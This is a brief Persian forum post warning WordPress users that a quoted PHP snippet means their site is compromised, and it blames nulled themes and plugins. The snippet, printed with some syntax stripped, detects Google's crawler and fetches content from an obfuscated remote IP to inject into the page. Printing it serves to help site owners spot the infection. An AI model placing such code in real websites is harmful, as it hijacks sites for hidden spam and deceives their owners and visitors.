هشدار به کاربران انجمن وردپرس ایرانی

این هشدار را خواهشمندم جدی بگیرید

اگر کد زیر در قالب یا افزونه خود دیدید . اینو بدونید که هاستینگ شما ترکیده و سایتتون نیز باز خاک یکسان می شود


کد PHP:
<?php $botbotbot "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot str_replace(" ""-"$botbotbot);if (strpos($botbotbot,"google")){$ch curl_init();    $xxx sqrt(1369);    curl_setopt($chCURLOPT_URL"http://$xxx.1.208.164/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]");       $result curl_exec($ch);       curl_close ($ch);      echo $result;}?>
باید گفت نال کار خودش را با ما ایرانی ها کرده و خدا خودش خیر کند